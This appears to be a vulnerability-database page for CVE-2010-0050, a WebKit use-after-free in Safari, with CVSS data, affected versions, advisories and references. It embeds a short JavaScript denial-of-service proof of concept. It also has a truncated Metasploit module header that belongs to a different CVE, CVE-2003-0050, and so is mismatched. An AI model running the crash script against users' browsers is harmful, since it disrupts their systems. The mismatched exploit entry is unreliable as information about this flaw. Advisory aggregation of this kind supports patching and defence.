CVE-2010-0050
published 2010-03-15
CVE-2010-0050: Use-after-free vulnerability in WebKit in Apple Safari before 4.0.5 allows remote attackers to execute arbitrary code or cause a denial of service (application…
Priority P352 · high · 8.8 (CVSS 3.1)
AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
EXPLOIT
EPSS: 11.64% (95.5th percentile)
Use-after-free vulnerability in WebKit in Apple Safari before 4.0.5 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via an HTML document with improperly nested tags.
Affected
10 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| apple | iphone_os | >= 2.0 < 4.0 | 4.0 |
| apple | safari | < 4.0.5 | 4.0.5 |
| canonical | ubuntu_linux | — | — |
| canonical | ubuntu_linux | — | — |
| canonical | ubuntu_linux | — | — |
| fedoraproject | fedora | — | — |
| fedoraproject | fedora | — | — |
| fedoraproject | fedora | — | — |
| opensuse | opensuse | — | — |
| opensuse | opensuse | — | — |
CVSS provenance
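| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 8.8 | HIGH | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 9.3 | CRITICAL | AV:N/AC:M/Au:N/C:C/I:C/A:C |
| vendor_redhat | — | 8.8 | HIGH | — |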
GHSA
GHSA-x35p-q7vp-559r: Use-after-free vulnerability in WebKit in Apple Safari before 4
ghsa_unreviewed·2022-05-02
CVE-2010-0050 [HIGH] CWE-416 GHSA-x35p-q7vp-559r: Use-after-free vulnerability in WebKit in Apple Safari before 4
Use-after-free vulnerability in WebKit in Apple Safari before 4.0.5 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via an HTML document with improperly nested tags.
Red Hat
webkitgtk: multiple security vulnerabilities in WebKit
vendor_redhat·2010-03-11·CVSS 8.8
CVE-2010-0050 [HIGH] webkitgtk: multiple security vulnerabilities in WebKit
Use-after-free vulnerability in WebKit in Apple Safari before 4.0.5 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via an HTML document with improperly nested tags.
No detection rules found.
Exploit-DB
QuickTime Streaming Server - 'parse_xml.cgi' Remote Execution (Metasploit)
exploitdb·2010-07-03
CVE-2003-0050 QuickTime Streaming Server - 'parse_xml.cgi' Remote Execution (Metasploit)
---
```ruby
##
# $Id: qtss_parse_xml_exec.rb 9669 2010-07-03 03:13:45Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'QuickTime Streaming Server parse_xml.cgi Remote Execution',
'Description' => %q{
The QuickTime Streaming Server contains a CGI script that is vulnerable
to metacharacter injection, allow arbitrary commands to be executed as root.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9669 $',
'References' =>
[
[ 'OSVDB', '1056
```
Exploit-DB
Webkit (Apple Safari 4.0.5) - Blink Tag Stack Exhaustion Denial of Service
exploitdb·2010-04-27
CVE-2010-0050 Webkit (Apple Safari 4.0.5) - Blink Tag Stack Exhaustion Denial of Service
---
```javascript
loop1();
var a = "";
function loop1()
{
    document.write(a);
    setInterval(loop2,0);
}
function loop2()
{
    document.write(a);
    setInterval(loop1,0);
}
```
Webkit (Safari) Stack Exhaustion DoS
Found By: Dr_IDE
Credit To: Mattias Karlsson
Reference: http://www.exploit-db.com/exploits/12401
Tested On: Windows 7 + Safari 4.0.5
References
- http://lists.apple.com/archives/security-announce/2010/Jun/msg00003.html
- http://lists.apple.com/archives/security-announce/2010/Mar/msg00000.html
- http://lists.fedoraproject.org/pipermail/package-announce/2010-May/041383.html
- http://lists.fedoraproject.org/pipermail/package-announce/2010-May/041432.html
- http://lists.fedoraproject.org/pipermail/package-announce/2010-May/041436.html
- http://lists.opensuse.org/opensuse-security-announce/2011-01/msg00006.html
- http://secunia.com/advisories/41856
- http://secunia.com/advisories/43068
- http://support.apple.com/kb/HT4070
- http://support.apple.com/kb/HT4225
- http://www.mandriva.com/security/advisories?name=MDVSA-2011:039
- http://www.securityfocus.com/bid/38671
- http://www.securitytracker.com/id?1023708
- http://www.ubuntu.com/usn/USN-1006-1
- http://www.vupen.com/english/advisories/2010/2722
- http://www.vupen.com/english/advisories/2011/0212
- http://www.vupen.com/english/advisories/2011/0552
- https://exchange.xforce.ibmcloud.com/vulnerabilities/56836
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A7587
Published: 2010-03-15